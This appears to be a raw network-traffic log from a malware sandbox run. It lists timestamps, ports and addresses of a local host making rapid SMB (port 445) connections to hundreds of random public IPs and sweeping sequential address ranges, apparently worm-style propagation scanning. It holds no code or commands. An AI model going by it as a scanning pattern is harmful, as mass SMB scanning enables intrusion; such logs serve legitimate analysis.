                                                        Dec 22, 2022 10:06:42.370552063 CET44554702149.248.216.2192.168.2.5
                                                        Dec 22, 2022 10:06:42.370798111 CET54702445192.168.2.5149.248.216.2
                                                        Dec 22, 2022 10:06:42.370872974 CET54702445192.168.2.5149.248.216.2
                                                        Dec 22, 2022 10:06:42.397360086 CET44554702149.248.216.2192.168.2.5
                                                        Dec 22, 2022 10:06:42.414582968 CET4455469788.218.188.10192.168.2.5
                                                        Dec 22, 2022 10:06:42.415286064 CET4455469788.218.188.10192.168.2.5
                                                        Dec 22, 2022 10:06:42.417191029 CET54703445192.168.2.5173.135.234.230
                                                        Dec 22, 2022 10:06:42.417220116 CET54704445192.168.2.554.253.29.183
                                                        Dec 22, 2022 10:06:42.417654991 CET54707445192.168.2.555.190.90.58
                                                        Dec 22, 2022 10:06:42.417844057 CET54709445192.168.2.5203.27.49.123
                                                        Dec 22, 2022 10:06:42.418107033 CET54711445192.168.2.5187.37.227.76
                                                        Dec 22, 2022 10:06:42.418370008 CET54713445192.168.2.559.200.41.73
                                                        Dec 22, 2022 10:06:42.418586016 CET54716445192.168.2.547.75.66.174
                                                        Dec 22, 2022 10:06:42.418703079 CET54717445192.168.2.5117.171.50.213
                                                        Dec 22, 2022 10:06:42.418801069 CET54718445192.168.2.5142.96.50.67
                                                        Dec 22, 2022 10:06:42.419267893 CET54723445192.168.2.5142.252.149.40
                                                        Dec 22, 2022 10:06:42.419620991 CET54725445192.168.2.536.248.223.168
                                                        Dec 22, 2022 10:06:42.420265913 CET54734445192.168.2.5158.46.163.162
                                                        Dec 22, 2022 10:06:42.420428038 CET54735445192.168.2.529.5.67.186
                                                        Dec 22, 2022 10:06:42.420515060 CET54736445192.168.2.5199.159.105.95
                                                        Dec 22, 2022 10:06:42.420717001 CET54738445192.168.2.5138.235.99.160
                                                        Dec 22, 2022 10:06:42.421181917 CET54743445192.168.2.598.5.84.50
                                                        Dec 22, 2022 10:06:42.421252966 CET54744445192.168.2.5106.16.151.226
                                                        Dec 22, 2022 10:06:42.421788931 CET54745445192.168.2.5222.140.252.87
                                                        Dec 22, 2022 10:06:42.422485113 CET54746445192.168.2.5106.252.210.137
                                                        Dec 22, 2022 10:06:42.423069954 CET54747445192.168.2.5110.207.244.180
                                                        Dec 22, 2022 10:06:42.423645973 CET54748445192.168.2.554.189.213.32
                                                        Dec 22, 2022 10:06:42.424211979 CET54749445192.168.2.513.131.159.128
                                                        Dec 22, 2022 10:06:42.432615042 CET54750445192.168.2.554.43.139.62
                                                        Dec 22, 2022 10:06:42.432918072 CET54753445192.168.2.560.155.137.19
                                                        Dec 22, 2022 10:06:42.433521986 CET54758445192.168.2.5144.28.61.115
                                                        Dec 22, 2022 10:06:42.698054075 CET54765445192.168.2.541.203.13.86
                                                        Dec 22, 2022 10:06:43.310777903 CET54628445192.168.2.5142.219.19.1
                                                        Dec 22, 2022 10:06:43.322854042 CET54769445192.168.2.538.35.118.10
                                                        Dec 22, 2022 10:06:43.497188091 CET4455476938.35.118.10192.168.2.5
                                                        Dec 22, 2022 10:06:43.497443914 CET54769445192.168.2.538.35.118.10
                                                        Dec 22, 2022 10:06:43.497443914 CET54769445192.168.2.538.35.118.10
                                                        Dec 22, 2022 10:06:43.527630091 CET54772445192.168.2.5212.118.121.218
                                                        Dec 22, 2022 10:06:43.528414965 CET54773445192.168.2.588.51.23.14
                                                        Dec 22, 2022 10:06:43.528973103 CET54776445192.168.2.5216.12.228.59
                                                        Dec 22, 2022 10:06:43.529074907 CET54778445192.168.2.5220.201.118.246
                                                        Dec 22, 2022 10:06:43.529103994 CET54779445192.168.2.51.3.138.167
                                                        Dec 22, 2022 10:06:43.529453993 CET54784445192.168.2.517.111.154.14
                                                        Dec 22, 2022 10:06:43.529644012 CET54786445192.168.2.5112.231.146.202
                                                        Dec 22, 2022 10:06:43.529655933 CET54787445192.168.2.584.98.182.170
                                                        Dec 22, 2022 10:06:43.529927969 CET54793445192.168.2.5161.182.131.110
                                                        Dec 22, 2022 10:06:43.530016899 CET54795445192.168.2.567.205.242.50
                                                        Dec 22, 2022 10:06:43.530258894 CET54800445192.168.2.534.29.10.223
                                                        Dec 22, 2022 10:06:43.530317068 CET54801445192.168.2.5210.164.31.38
                                                        Dec 22, 2022 10:06:43.530385971 CET54802445192.168.2.5165.21.249.116
                                                        Dec 22, 2022 10:06:43.530494928 CET54805445192.168.2.538.129.195.167
                                                        Dec 22, 2022 10:06:43.530679941 CET54807445192.168.2.5125.164.234.235
                                                        Dec 22, 2022 10:06:43.530834913 CET54809445192.168.2.564.133.105.149
                                                        Dec 22, 2022 10:06:43.530915022 CET54811445192.168.2.5175.10.95.101
                                                        Dec 22, 2022 10:06:43.531018972 CET54815445192.168.2.5116.4.212.175
                                                        Dec 22, 2022 10:06:43.531965971 CET54816445192.168.2.5195.12.133.204
                                                        Dec 22, 2022 10:06:43.532131910 CET54817445192.168.2.5111.222.246.211
                                                        Dec 22, 2022 10:06:43.532186031 CET54818445192.168.2.5145.28.114.105
                                                        Dec 22, 2022 10:06:43.541599035 CET54819445192.168.2.5188.171.152.38
                                                        Dec 22, 2022 10:06:43.541605949 CET54820445192.168.2.5180.77.2.75
                                                        Dec 22, 2022 10:06:43.562176943 CET44554816195.12.133.204192.168.2.5
                                                        Dec 22, 2022 10:06:43.671849966 CET4455476938.35.118.10192.168.2.5
                                                        Dec 22, 2022 10:06:43.671977997 CET54769445192.168.2.538.35.118.10
                                                        Dec 22, 2022 10:06:43.760478973 CET54834445192.168.2.541.203.13.87
                                                        Dec 22, 2022 10:06:43.846446037 CET4455476938.35.118.10192.168.2.5
                                                        Dec 22, 2022 10:06:43.846582890 CET54769445192.168.2.538.35.118.10
                                                        Dec 22, 2022 10:06:44.021217108 CET4455476938.35.118.10192.168.2.5
                                                        Dec 22, 2022 10:06:44.073717117 CET54816445192.168.2.5195.12.133.204
                                                        Dec 22, 2022 10:06:44.094799042 CET54837445192.168.2.538.35.118.11
                                                        Dec 22, 2022 10:06:44.275846958 CET4455483738.35.118.11192.168.2.5
                                                        Dec 22, 2022 10:06:44.276120901 CET54837445192.168.2.538.35.118.11
                                                        Dec 22, 2022 10:06:44.276390076 CET54837445192.168.2.538.35.118.11
                                                        Dec 22, 2022 10:06:44.277921915 CET54840445192.168.2.538.35.118.11
                                                        Dec 22, 2022 10:06:44.456868887 CET4455483738.35.118.11192.168.2.5
                                                        Dec 22, 2022 10:06:44.456935883 CET4455483738.35.118.11192.168.2.5
                                                        Dec 22, 2022 10:06:44.458843946 CET4455484038.35.118.11192.168.2.5
                                                        Dec 22, 2022 10:06:44.459105015 CET54840445192.168.2.538.35.118.11
                                                        Dec 22, 2022 10:06:44.459177971 CET54840445192.168.2.538.35.118.11
                                                        Dec 22, 2022 10:06:44.640656948 CET4455484038.35.118.11192.168.2.5
                                                        Dec 22, 2022 10:06:44.640795946 CET54840445192.168.2.538.35.118.11
                                                        Dec 22, 2022 10:06:44.651490927 CET54851445192.168.2.559.16.53.222
                                                        Dec 22, 2022 10:06:44.651693106 CET54852445192.168.2.5218.124.61.108
                                                        Dec 22, 2022 10:06:44.651881933 CET54855445192.168.2.543.42.166.7
                                                        Dec 22, 2022 10:06:44.652226925 CET54858445192.168.2.5153.168.148.132
                                                        Dec 22, 2022 10:06:44.652370930 CET54859445192.168.2.519.218.248.223
                                                        Dec 22, 2022 10:06:44.652481079 CET54861445192.168.2.5148.230.20.100
                                                        Dec 22, 2022 10:06:44.652777910 CET54866445192.168.2.511.49.95.218
                                                        Dec 22, 2022 10:06:44.652940989 CET54868445192.168.2.5193.37.3.215
                                                        Dec 22, 2022 10:06:44.653095007 CET54870445192.168.2.52.104.17.32
                                                        Dec 22, 2022 10:06:44.653376102 CET54876445192.168.2.5201.50.251.147
                                                        Dec 22, 2022 10:06:44.653481007 CET54878445192.168.2.5168.235.79.33
                                                        Dec 22, 2022 10:06:44.653789043 CET54882445192.168.2.5209.227.228.204
                                                        Dec 22, 2022 10:06:44.653893948 CET54883445192.168.2.5194.166.129.32
                                                        Dec 22, 2022 10:06:44.653920889 CET54884445192.168.2.5116.240.194.27
                                                        Dec 22, 2022 10:06:44.654076099 CET54886445192.168.2.599.219.182.172
                                                        Dec 22, 2022 10:06:44.654181957 CET54888445192.168.2.521.31.63.39
                                                        Dec 22, 2022 10:06:44.654611111 CET54893445192.168.2.5109.6.78.20
                                                        Dec 22, 2022 10:06:44.654634953 CET54892445192.168.2.5101.84.190.168
                                                        Dec 22, 2022 10:06:44.654771090 CET54896445192.168.2.5215.86.118.27
                                                        Dec 22, 2022 10:06:44.654845953 CET54897445192.168.2.5150.109.42.100
                                                        Dec 22, 2022 10:06:44.657176018 CET54898445192.168.2.518.23.26.254
                                                        Dec 22, 2022 10:06:44.657176018 CET54899445192.168.2.516.91.126.121
                                                        Dec 22, 2022 10:06:44.657263041 CET54901445192.168.2.5125.41.196.197
                                                        Dec 22, 2022 10:06:44.657583952 CET54900445192.168.2.598.233.111.109
                                                        Dec 22, 2022 10:06:44.775785923 CET53686445192.168.2.584.7.167.2
                                                        Dec 22, 2022 10:06:44.821548939 CET4455484038.35.118.11192.168.2.5
                                                        Dec 22, 2022 10:06:44.821804047 CET54840445192.168.2.538.35.118.11
                                                        Dec 22, 2022 10:06:44.823296070 CET54904445192.168.2.541.203.13.88
                                                        Dec 22, 2022 10:06:45.002506971 CET4455484038.35.118.11192.168.2.5
                                                        Dec 22, 2022 10:06:45.338291883 CET54628445192.168.2.5142.219.19.1
                                                        Dec 22, 2022 10:06:45.356424093 CET54908445192.168.2.588.218.188.10
                                                        Dec 22, 2022 10:06:45.402731895 CET4455490888.218.188.10192.168.2.5
                                                        Dec 22, 2022 10:06:45.405514002 CET54908445192.168.2.588.218.188.10
                                                        Dec 22, 2022 10:06:45.405514002 CET54908445192.168.2.588.218.188.10
                                                        Dec 22, 2022 10:06:45.451699018 CET4455490888.218.188.10192.168.2.5
                                                        Dec 22, 2022 10:06:45.452059984 CET54908445192.168.2.588.218.188.10
                                                        Dec 22, 2022 10:06:45.498334885 CET4455490888.218.188.10192.168.2.5
                                                        Dec 22, 2022 10:06:45.498508930 CET54908445192.168.2.588.218.188.10
                                                        Dec 22, 2022 10:06:45.544822931 CET4455490888.218.188.10192.168.2.5
                                                        Dec 22, 2022 10:06:45.547480106 CET54908445192.168.2.588.218.188.10
                                                        Dec 22, 2022 10:06:45.593601942 CET4455490888.218.188.10192.168.2.5
                                                        Dec 22, 2022 10:06:45.596055031 CET54908445192.168.2.588.218.188.10
                                                        Dec 22, 2022 10:06:45.642301083 CET4455490888.218.188.10192.168.2.5
                                                        Dec 22, 2022 10:06:45.642976046 CET4455490888.218.188.10192.168.2.5
                                                        Dec 22, 2022 10:06:45.655616045 CET54913445192.168.2.588.218.188.11
                                                        Dec 22, 2022 10:06:45.777038097 CET54922445192.168.2.5219.143.30.201
                                                        Dec 22, 2022 10:06:45.777200937 CET54923445192.168.2.5122.100.33.130
                                                        Dec 22, 2022 10:06:45.777498960 CET54926445192.168.2.5197.10.35.33
                                                        Dec 22, 2022 10:06:45.777843952 CET54929445192.168.2.5172.48.27.230
                                                        Dec 22, 2022 10:06:45.778165102 CET54932445192.168.2.569.125.182.167
                                                        Dec 22, 2022 10:06:45.778177977 CET54931445192.168.2.5111.136.206.217
                                                        Dec 22, 2022 10:06:45.778678894 CET54938445192.168.2.565.186.177.36
                                                        Dec 22, 2022 10:06:45.778769016 CET54939445192.168.2.517.200.68.90
                                                        Dec 22, 2022 10:06:45.778975964 CET54940445192.168.2.541.242.71.191
                                                        Dec 22, 2022 10:06:45.779607058 CET54947445192.168.2.5204.6.72.20
                                                        Dec 22, 2022 10:06:45.779825926 CET54948445192.168.2.5112.129.193.193
                                                        Dec 22, 2022 10:06:45.780106068 CET54952445192.168.2.5191.247.124.146
                                                        Dec 22, 2022 10:06:45.780369997 CET54955445192.168.2.5153.176.51.122
                                                        Dec 22, 2022 10:06:45.780417919 CET54956445192.168.2.5122.33.221.232
                                                        Dec 22, 2022 10:06:45.780750990 CET54958445192.168.2.536.81.207.24
                                                        Dec 22, 2022 10:06:45.780898094 CET54959445192.168.2.568.203.193.254
                                                        Dec 22, 2022 10:06:45.781181097 CET54963445192.168.2.511.117.239.53
                                                        Dec 22, 2022 10:06:45.781392097 CET54965445192.168.2.5132.40.79.121
                                                        Dec 22, 2022 10:06:45.781594038 CET54967445192.168.2.5220.102.233.242
                                                        Dec 22, 2022 10:06:45.781871080 CET54968445192.168.2.534.245.9.44
                                                        Dec 22, 2022 10:06:45.784663916 CET54969445192.168.2.5137.107.224.87
                                                        Dec 22, 2022 10:06:45.784781933 CET54970445192.168.2.59.35.171.204
                                                        Dec 22, 2022 10:06:45.784797907 CET54971445192.168.2.5137.202.94.158
                                                        Dec 22, 2022 10:06:45.784888983 CET54972445192.168.2.5158.250.250.128
                                                        Dec 22, 2022 10:06:45.784979105 CET54973445192.168.2.5183.20.12.207
                                                        Dec 22, 2022 10:06:45.885632992 CET54974445192.168.2.541.203.13.89
                                                        Dec 22, 2022 10:06:46.507026911 CET44554628142.219.19.1192.168.2.5
                                                        Dec 22, 2022 10:06:46.507060051 CET44554628142.219.19.1192.168.2.5
                                                        Dec 22, 2022 10:06:46.507077932 CET44554628142.219.19.1192.168.2.5
                                                        Dec 22, 2022 10:06:46.574083090 CET54982445192.168.2.5142.219.19.2
                                                        Dec 22, 2022 10:06:46.717112064 CET54985445192.168.2.588.218.188.12
                                                        Dec 22, 2022 10:06:46.739866972 CET44554982142.219.19.2192.168.2.5
                                                        Dec 22, 2022 10:06:46.740089893 CET54982445192.168.2.5142.219.19.2
                                                        Dec 22, 2022 10:06:46.740238905 CET54982445192.168.2.5142.219.19.2
                                                        Dec 22, 2022 10:06:46.740941048 CET54986445192.168.2.5142.219.19.2
                                                        Dec 22, 2022 10:06:46.902468920 CET54990445192.168.2.5118.246.44.215
                                                        Dec 22, 2022 10:06:46.902590036 CET54992445192.168.2.57.20.87.20
                                                        Dec 22, 2022 10:06:46.902916908 CET54994445192.168.2.5122.58.83.132
                                                        Dec 22, 2022 10:06:46.903044939 CET54995445192.168.2.5196.214.246.167
                                                        Dec 22, 2022 10:06:46.903867960 CET54996445192.168.2.551.52.63.8
                                                        Dec 22, 2022 10:06:46.904676914 CET54997445192.168.2.5130.221.84.241
                                                        Dec 22, 2022 10:06:46.905452967 CET54998445192.168.2.556.138.29.15
                                                        Dec 22, 2022 10:06:46.906235933 CET54999445192.168.2.5173.22.69.252
                                                        Dec 22, 2022 10:06:46.906510115 CET44554986142.219.19.2192.168.2.5
                                                        Dec 22, 2022 10:06:46.906610966 CET54986445192.168.2.5142.219.19.2
                                                        Dec 22, 2022 10:06:46.906647921 CET54986445192.168.2.5142.219.19.2
                                                        Dec 22, 2022 10:06:46.907079935 CET55000445192.168.2.5188.127.7.143
                                                        Dec 22, 2022 10:06:46.907366991 CET55001445192.168.2.580.202.95.139
                                                        Dec 22, 2022 10:06:46.907567024 CET55002445192.168.2.524.135.165.2
                                                        Dec 22, 2022 10:06:46.908437014 CET55009445192.168.2.5145.223.216.171
                                                        Dec 22, 2022 10:06:46.908665895 CET55011445192.168.2.53.195.90.223
                                                        Dec 22, 2022 10:06:46.909240007 CET55015445192.168.2.5207.159.19.110
                                                        Dec 22, 2022 10:06:46.909478903 CET55017445192.168.2.577.40.251.12
                                                        Dec 22, 2022 10:06:46.909595013 CET55018445192.168.2.5199.92.164.169
                                                        Dec 22, 2022 10:06:46.909960032 CET55020445192.168.2.542.31.43.132
                                                        Dec 22, 2022 10:06:46.910085917 CET55021445192.168.2.575.43.121.248
                                                        Dec 22, 2022 10:06:46.910326004 CET55023445192.168.2.5206.197.40.130
                                                        Dec 22, 2022 10:06:46.910902023 CET55027445192.168.2.591.156.64.122
                                                        Dec 22, 2022 10:06:46.911036968 CET55028445192.168.2.5188.251.206.87
                                                        Dec 22, 2022 10:06:46.911227942 CET55029445192.168.2.586.196.167.130
                                                        Dec 22, 2022 10:06:46.912425041 CET55035445192.168.2.5170.19.144.26
                                                        Dec 22, 2022 10:06:46.913235903 CET55044445192.168.2.5204.232.16.104
                                                        Dec 22, 2022 10:06:46.913417101 CET55045445192.168.2.5162.32.60.252
                                                        Dec 22, 2022 10:06:46.948262930 CET55047445192.168.2.541.203.13.90
                                                        Dec 22, 2022 10:06:47.260335922 CET54982445192.168.2.5142.219.19.2
                                                        Dec 22, 2022 10:06:47.300159931 CET44554526149.248.216.167192.168.2.5
                                                        Dec 22, 2022 10:06:47.300591946 CET54526445192.168.2.5149.248.216.167
                                                        Dec 22, 2022 10:06:47.354139090 CET54986445192.168.2.5142.219.19.2
                                                        Dec 22, 2022 10:06:47.557245970 CET53748445192.168.2.584.7.167.2
                                                        Dec 22, 2022 10:06:47.795331001 CET55055445192.168.2.588.218.188.13
                                                        Dec 22, 2022 10:06:47.885432959 CET54986445192.168.2.5142.219.19.2
                                                        Dec 22, 2022 10:06:48.010708094 CET55058445192.168.2.538.35.118.11
                                                        Dec 22, 2022 10:06:48.010936022 CET55059445192.168.2.541.203.13.91
                                                        Dec 22, 2022 10:06:48.026465893 CET55060445192.168.2.560.227.210.66
                                                        Dec 22, 2022 10:06:48.026563883 CET55062445192.168.2.5194.87.13.129
                                                        Dec 22, 2022 10:06:48.026813984 CET55067445192.168.2.5193.248.80.91
                                                        Dec 22, 2022 10:06:48.026897907 CET55068445192.168.2.577.33.195.52
                                                        Dec 22, 2022 10:06:48.027173042 CET55075445192.168.2.5155.212.8.183
                                                        Dec 22, 2022 10:06:48.027316093 CET55076445192.168.2.5169.217.125.193
                                                        Dec 22, 2022 10:06:48.027451038 CET55077445192.168.2.5186.33.68.209
                                                        Dec 22, 2022 10:06:48.027523994 CET55078445192.168.2.5130.87.26.244
                                                        Dec 22, 2022 10:06:48.027623892 CET55080445192.168.2.5118.206.65.88
                                                        Dec 22, 2022 10:06:48.027740955 CET55082445192.168.2.526.22.218.64
                                                        Dec 22, 2022 10:06:48.027951002 CET55088445192.168.2.5196.165.91.75
                                                        Dec 22, 2022 10:06:48.027952909 CET55087445192.168.2.5102.251.171.40
                                                        Dec 22, 2022 10:06:48.028654099 CET55097445192.168.2.571.227.84.29
                                                        Dec 22, 2022 10:06:48.028724909 CET55104445192.168.2.579.80.38.196
                                                        Dec 22, 2022 10:06:48.028688908 CET55103445192.168.2.552.100.1.105
                                                        Dec 22, 2022 10:06:48.028743982 CET55105445192.168.2.565.119.16.193
                                                        Dec 22, 2022 10:06:48.028922081 CET55109445192.168.2.5122.134.125.134
                                                        Dec 22, 2022 10:06:48.029114008 CET55112445192.168.2.5155.243.175.1
                                                        Dec 22, 2022 10:06:48.029176950 CET55110445192.168.2.584.68.4.210
                                                        Dec 22, 2022 10:06:48.029300928 CET55114445192.168.2.5143.210.153.183
                                                        Dec 22, 2022 10:06:48.030735016 CET55115445192.168.2.5218.23.1.115
                                                        Dec 22, 2022 10:06:48.030993938 CET55116445192.168.2.561.129.222.21
                                                        Dec 22, 2022 10:06:48.031095028 CET55117445192.168.2.5216.70.38.126
                                                        Dec 22, 2022 10:06:48.031256914 CET55118445192.168.2.5177.94.242.12
                                                        Dec 22, 2022 10:06:48.191675901 CET4455505838.35.118.11192.168.2.5
                                                        Dec 22, 2022 10:06:48.191821098 CET55058445192.168.2.538.35.118.11
                                                        Dec 22, 2022 10:06:48.191869020 CET55058445192.168.2.538.35.118.11
                                                        Dec 22, 2022 10:06:48.244791031 CET54982445192.168.2.5142.219.19.2
                                                        Dec 22, 2022 10:06:48.373301983 CET4455505838.35.118.11192.168.2.5
                                                        Dec 22, 2022 10:06:48.373503923 CET55058445192.168.2.538.35.118.11
                                                        Dec 22, 2022 10:06:48.416677952 CET54213445192.168.2.5155.100.133.2
                                                        Dec 22, 2022 10:06:48.555003881 CET4455505838.35.118.11192.168.2.5
                                                        Dec 22, 2022 10:06:48.557269096 CET55058445192.168.2.538.35.118.11
                                                        Dec 22, 2022 10:06:48.738259077 CET4455505838.35.118.11192.168.2.5
                                                        Dec 22, 2022 10:06:48.792447090 CET55128445192.168.2.538.35.118.12
                                                        Dec 22, 2022 10:06:48.869899988 CET54986445192.168.2.5142.219.19.2
                                                        Dec 22, 2022 10:06:48.870625019 CET55129445192.168.2.588.218.188.14
                                                        Dec 22, 2022 10:06:48.964159966 CET4455512838.35.118.12192.168.2.5
                                                        Dec 22, 2022 10:06:48.964287996 CET55128445192.168.2.538.35.118.12
                                                        Dec 22, 2022 10:06:48.964462042 CET55128445192.168.2.538.35.118.12
                                                        Dec 22, 2022 10:06:48.967145920 CET55132445192.168.2.538.35.118.12
                                                        Dec 22, 2022 10:06:49.073604107 CET55133445192.168.2.541.203.13.92
                                                        Dec 22, 2022 10:06:49.135826111 CET4455512838.35.118.12192.168.2.5
                                                        Dec 22, 2022 10:06:49.135955095 CET4455512838.35.118.12192.168.2.5
                                                        Dec 22, 2022 10:06:49.136563063 CET55138445192.168.2.5195.81.108.14
                                                        Dec 22, 2022 10:06:49.136562109 CET55136445192.168.2.5108.160.222.135
                                                        Dec 22, 2022 10:06:49.136673927 CET55140445192.168.2.540.92.16.166
                                                        Dec 22, 2022 10:06:49.136796951 CET55141445192.168.2.5191.117.204.216
                                                        Dec 22, 2022 10:06:49.136975050 CET55145445192.168.2.576.31.56.222
                                                        Dec 22, 2022 10:06:49.137222052 CET55148445192.168.2.5205.31.139.139
                                                        Dec 22, 2022 10:06:49.137231112 CET55147445192.168.2.5102.52.120.93
                                                        Dec 22, 2022 10:06:49.137346983 CET55150445192.168.2.518.24.150.210
                                                        Dec 22, 2022 10:06:49.137901068 CET55161445192.168.2.543.140.183.85
                                                        Dec 22, 2022 10:06:49.138174057 CET55164445192.168.2.594.243.187.31
                                                        Dec 22, 2022 10:06:49.138323069 CET55166445192.168.2.5117.168.19.158
                                                        Dec 22, 2022 10:06:49.138336897 CET55160445192.168.2.551.248.23.100
                                                        Dec 22, 2022 10:06:49.138619900 CET4455513238.35.118.12192.168.2.5
                                                        Dec 22, 2022 10:06:49.138664007 CET55170445192.168.2.5159.34.246.152
                                                        Dec 22, 2022 10:06:49.138768911 CET55171445192.168.2.5196.131.123.132
                                                        Dec 22, 2022 10:06:49.138920069 CET55172445192.168.2.567.120.115.194
                                                        Dec 22, 2022 10:06:49.139012098 CET55173445192.168.2.5142.210.48.20
                                                        Dec 22, 2022 10:06:49.139413118 CET55181445192.168.2.518.80.71.30
                                                        Dec 22, 2022 10:06:49.139512062 CET55180445192.168.2.5128.217.90.133
                                                        Dec 22, 2022 10:06:49.139899969 CET55187445192.168.2.5190.80.39.106
                                                        Dec 22, 2022 10:06:49.140614986 CET55132445192.168.2.538.35.118.12
                                                        Dec 22, 2022 10:06:49.140614986 CET55132445192.168.2.538.35.118.12
                                                        Dec 22, 2022 10:06:49.140614986 CET55186445192.168.2.5203.147.97.57
                                                        Dec 22, 2022 10:06:49.141890049 CET55189445192.168.2.518.124.56.24
                                                        Dec 22, 2022 10:06:49.142466068 CET55190445192.168.2.585.122.183.200
                                                        Dec 22, 2022 10:06:49.142815113 CET55192445192.168.2.546.66.70.50
                                                        Dec 22, 2022 10:06:49.142889023 CET55193445192.168.2.5213.246.26.171
                                                        Dec 22, 2022 10:06:49.142890930 CET55191445192.168.2.5210.169.24.79
                                                        Dec 22, 2022 10:06:49.312376976 CET4455513238.35.118.12192.168.2.5
                                                        Dec 22, 2022 10:06:49.312624931 CET55132445192.168.2.538.35.118.12
                                                        Dec 22, 2022 10:06:49.484119892 CET4455513238.35.118.12192.168.2.5
                                                        Dec 22, 2022 10:06:49.484270096 CET55132445192.168.2.538.35.118.12
                                                        Dec 22, 2022 10:06:49.495007038 CET54215445192.168.2.5155.100.133.2
                                                        Dec 22, 2022 10:06:49.655986071 CET4455513238.35.118.12192.168.2.5
                                                        Dec 22, 2022 10:06:49.948764086 CET55202445192.168.2.588.218.188.15
                                                        Dec 22, 2022 10:06:50.151815891 CET55206445192.168.2.541.203.13.93
                                                        Dec 22, 2022 10:06:50.213762999 CET54982445192.168.2.5142.219.19.2
                                                        Dec 22, 2022 10:06:50.246321917 CET55209445192.168.2.5157.87.151.72
                                                        Dec 22, 2022 10:06:50.246860027 CET55211445192.168.2.5103.55.158.132
                                                        Dec 22, 2022 10:06:50.247788906 CET55213445192.168.2.526.17.55.205
                                                        Dec 22, 2022 10:06:50.248126984 CET55214445192.168.2.59.136.188.54
                                                        Dec 22, 2022 10:06:50.248929024 CET55217445192.168.2.5214.76.194.224
                                                        Dec 22, 2022 10:06:50.249126911 CET55220445192.168.2.546.18.193.193
                                                        Dec 22, 2022 10:06:50.249221087 CET55221445192.168.2.5108.116.53.119
                                                        Dec 22, 2022 10:06:50.249372959 CET55224445192.168.2.5154.8.101.56
                                                        Dec 22, 2022 10:06:50.249927044 CET55233445192.168.2.5116.185.213.71
                                                        Dec 22, 2022 10:06:50.250102997 CET55234445192.168.2.588.242.252.76
                                                        Dec 22, 2022 10:06:50.250154018 CET55237445192.168.2.5116.133.78.158
                                                        Dec 22, 2022 10:06:50.250235081 CET55238445192.168.2.5112.49.156.207
                                                        Dec 22, 2022 10:06:50.250583887 CET55243445192.168.2.5153.187.135.209
                                                        Dec 22, 2022 10:06:50.250746965 CET55244445192.168.2.593.119.227.81
                                                        Dec 22, 2022 10:06:50.250916958 CET55247445192.168.2.561.183.222.55
                                                        Dec 22, 2022 10:06:50.250921011 CET55245445192.168.2.5134.240.169.196
                                                        Dec 22, 2022 10:06:50.251235962 CET55253445192.168.2.5212.244.159.1
                                                        Dec 22, 2022 10:06:50.251435995 CET55255445192.168.2.5121.214.35.4
                                                        Dec 22, 2022 10:06:50.251732111 CET55258445192.168.2.5218.201.69.36
                                                        Dec 22, 2022 10:06:50.251996994 CET55261445192.168.2.572.90.146.57
                                                        Dec 22, 2022 10:06:50.254525900 CET55262445192.168.2.5155.187.174.169
                                                        Dec 22, 2022 10:06:50.254810095 CET55263445192.168.2.5206.140.75.190
                                                        Dec 22, 2022 10:06:50.255028963 CET55264445192.168.2.5214.78.13.186
                                                        Dec 22, 2022 10:06:50.255099058 CET55265445192.168.2.5147.138.227.24
                                                        Dec 22, 2022 10:06:50.255135059 CET55266445192.168.2.5118.94.124.68
                                                        Dec 22, 2022 10:06:50.278068066 CET4455522046.18.193.193192.168.2.5
                                                        Dec 22, 2022 10:06:50.573613882 CET55271445192.168.2.584.7.167.2
                                                        Dec 22, 2022 10:06:50.585534096 CET44554701149.248.216.2192.168.2.5
                                                        Dec 22, 2022 10:06:50.585716963 CET54701445192.168.2.5149.248.216.2
                                                        Dec 22, 2022 10:06:50.608459949 CET4455527184.7.167.2192.168.2.5
                                                        Dec 22, 2022 10:06:50.608572006 CET55271445192.168.2.584.7.167.2
                                                        Dec 22, 2022 10:06:50.608607054 CET55271445192.168.2.584.7.167.2
                                                        Dec 22, 2022 10:06:50.731753111 CET55274443192.168.2.520.90.153.243
                                                        Dec 22, 2022 10:06:50.731802940 CET4435527420.90.153.243192.168.2.5
                                                        Dec 22, 2022 10:06:50.731888056 CET55274443192.168.2.520.90.153.243
                                                        Dec 22, 2022 10:06:50.733023882 CET55274443192.168.2.520.90.153.243
                                                        Dec 22, 2022 10:06:50.733041048 CET4435527420.90.153.243192.168.2.5
                                                        Dec 22, 2022 10:06:50.772768021 CET44554702149.248.216.2192.168.2.5
                                                        Dec 22, 2022 10:06:50.792033911 CET55220445192.168.2.546.18.193.193
                                                        Dec 22, 2022 10:06:50.821116924 CET4455522046.18.193.193192.168.2.5
                                                        Dec 22, 2022 10:06:50.823220968 CET54986445192.168.2.5142.219.19.2
                                                        Dec 22, 2022 10:06:50.840202093 CET4435527420.90.153.243192.168.2.5
                                                        Dec 22, 2022 10:06:50.840372086 CET55274443192.168.2.520.90.153.243
                                                        Dec 22, 2022 10:06:50.843682051 CET55274443192.168.2.520.90.153.243
                                                        Dec 22, 2022 10:06:50.843698025 CET4435527420.90.153.243192.168.2.5
                                                        Dec 22, 2022 10:06:50.844047070 CET4435527420.90.153.243192.168.2.5
                                                        Dec 22, 2022 10:06:50.845200062 CET55274443192.168.2.520.90.153.243
                                                        Dec 22, 2022 10:06:50.845210075 CET4435527420.90.153.243192.168.2.5
                                                        Dec 22, 2022 10:06:50.845298052 CET55274443192.168.2.520.90.153.243
                                                        Dec 22, 2022 10:06:50.845316887 CET4435527420.90.153.243192.168.2.5
                                                        Dec 22, 2022 10:06:50.845460892 CET55274443192.168.2.520.90.153.243
                                                        Dec 22, 2022 10:06:50.845465899 CET4435527420.90.153.243192.168.2.5
                                                        Dec 22, 2022 10:06:50.870099068 CET55271445192.168.2.584.7.167.2
                                                        Dec 22, 2022 10:06:50.875015974 CET4435527420.90.153.243192.168.2.5
                                                        Dec 22, 2022 10:06:50.875138044 CET4435527420.90.153.243192.168.2.5
                                                        Dec 22, 2022 10:06:50.875204086 CET55274443192.168.2.520.90.153.243
                                                        Dec 22, 2022 10:06:50.875317097 CET55274443192.168.2.520.90.153.243
                                                        Dec 22, 2022 10:06:50.875335932 CET4435527420.90.153.243192.168.2.5
                                                        Dec 22, 2022 10:06:51.026768923 CET55277445192.168.2.588.218.188.16
                                                        Dec 22, 2022 10:06:51.182632923 CET55271445192.168.2.584.7.167.2
                                                        Dec 22, 2022 10:06:51.230026007 CET55281445192.168.2.541.203.13.94
                                                        Dec 22, 2022 10:06:51.370840073 CET55284445192.168.2.5115.209.136.117
                                                        Dec 22, 2022 10:06:51.371094942 CET55286445192.168.2.5128.41.152.15
                                                        Dec 22, 2022 10:06:51.371380091 CET55288445192.168.2.5108.38.76.175
                                                        Dec 22, 2022 10:06:51.371506929 CET55289445192.168.2.57.142.172.162
